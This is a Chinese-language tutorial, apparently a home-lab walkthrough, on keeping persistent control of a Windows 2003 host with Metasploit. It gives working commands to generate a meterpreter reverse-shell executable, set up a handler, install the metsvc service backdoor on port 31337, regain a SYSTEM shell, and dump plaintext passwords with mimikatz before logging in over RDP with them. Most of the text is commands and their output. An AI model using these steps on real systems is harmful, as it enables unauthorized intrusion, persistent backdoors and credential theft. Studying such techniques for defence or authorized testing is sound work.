利用Metasploit建立持续性会话后门

 

 


环境
Kali 1.0 IP:192.168.0.7
windows 2003 IP:192.168.0.128

本次文章 讲解Metasploit维持会话 建立服务后门

首先先来生成一个 msf的exe后门

 

 

msf > msfvenom -p windows/meterpreter/reverse_tcp LHOST=IP -f exe -o /root/桌面/test.exe //生成后门 msf > useexploit/multi/handler //使用模块 msf exploit(handler) > set lhostIP //设置kali的ip 不知道的可以ifconfig 查看一下 msf exploit(handler) > run //监听

大致的说下就行了
把后门拖到03主机 打开 上线后
利用Metasploit建立持续性会话后门_第1张图片
shell 进入cmd

我们发现 这不是最高权限

接着我们 exit 退出
利用Metasploit建立持续性会话后门_第2张图片
执行run metsvc -A

上传服务后门

 

meterpreter > run metsvc -A Creating a temporary installationdirectory C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\VbqGppxISmg... >>Uploading metsrv.dll... >> Uploadingmetsvc-server.exe... >> Uploading metsvc.exe... Starting theservice... *Installing service metsvc Cannot create service (0x00000431) Trying to connect to the Meterpreterservice at 192.168.0.128:31337... meterpreter > Meterpreter session 11 opened(192.168.0.7:54488 -> 192.168.0.128:31337) at 2017-03-18 19:08:18 +0800

我们会发现我们的msf后门已经掉线

利用Metasploit建立持续性会话后门_第3张图片
接着我们启用另一个终端

 

msfconsole //打开msf

 

配置一下

msf > useexploit/multi/handler 
msf exploit(handler) > setpayload windows/metsvc_bind_tcp 
payload =>windows/metsvc_bind_tcp
msf exploit(handler) > set LPORT31337
LPORT => 31337
msf exploit(handler) > set RHOST192.168.0.128

RHOST => 192.168.0.128

run //执行

成功上线


这里我们简单来说一下 

meterpreter >

Meterpreter session 11 opened(192.168.0.7:54488 -> 192.168.0.128:31337) at 2017-03-18 19:08:18 +0800

set LPORT 31337 是端口地址 监听的

利用Metasploit建立持续性会话后门_第4张图片
set RHOST 192.168.0.128 是03主机的ip地址

利用Metasploit建立持续性会话后门_第5张图片

run 执行
shell
我们可以看到 现在是c盘的cmd最高权限

 

 

 

 

 

 

 

 

 

利用Metasploit建立持续性会话后门_第6张图片

meterpreter > shell
Process 3612 created.
Channel 1 created.
Microsoft Windows [�汾 5.2.3790]
(C) ��Ȩ���� 1985-2003Microsoft Corp.
C:\WINDOWS\system32>whoami
whoami
nt authority\system
C:\WINDOWS\system32>

 

然后我们在哪个建立服务后门的msf上
 

Ctrl+c暂停


回显到meterpreter >

接着我们exit 退出

sessions -l
利用Metasploit建立持续性会话后门_第7张图片我们会看到已经维持控制了一台主机 也就是我的03主机

 

msf exploit(handler) > sessions -l Active sessions =============== Id Type Information Connection -- ---- ----------- ---------- 11 meterpreter x86/win32 NT AUTHORITY\SYSTEM @ WINDOWS2003 192.168.0.7:54488 -> 192.168.0.128:31337 (192.168.0.128) msf exploit(handler) >

接着我们 sessions -i 11 就能控制 从而达到一个长期控制的效果

 

利用Metasploit建立持续性会话后门_第8张图片

 

读取哈希值

利用Metasploit建立持续性会话后门_第9张图片对了 这里来说一下 Metasploit 有一款法国神器
加载 读取明文密码
load mimikatz //加载
wdigest //读取用户密码

 

加载后 我们来help查看一下帮助

 

 

利用Metasploit建立持续性会话后门_第10张图片

Mimikatz命令
=================
 
     命令说明
     ------- -----------
     kerberos尝试检索Kerberos凭据
     livessp尝试检索livessp creds
     mimikatz_command运行自定义commannd
     msv尝试检索msv凭证(哈希值)
     ssp尝试检索ssp creds
     tspkg尝试检索tspkg凭据
     wdigest尝试检索wdigest凭据

读取明文密码
利用Metasploit建立持续性会话后门_第11张图片

AuthID    Package    Domain        User             Password
------    -------    ------        ----             --------
0;999     NTLM       WORKGROUP     WINDOWS2003$     
0;996     Negotiate  NT AUTHORITY  NETWORK SERVICE  
0;51357   NTLM                                      
0;997     Negotiate  NT AUTHORITY  LOCAL SERVICE    
0;199556  NTLM       WINDOWS2003   Administrator    admin

使用administrator admin 登录

 

root@xaiSec:~# rdesktop 192.168.0.128 -u administrator -p admin

利用Metasploit建立持续性会话后门_第12张图片一般的Metasploit后门 关闭进程的话 会掉线 不会达到长期控制的效果

你可能感兴趣的:(技术分享)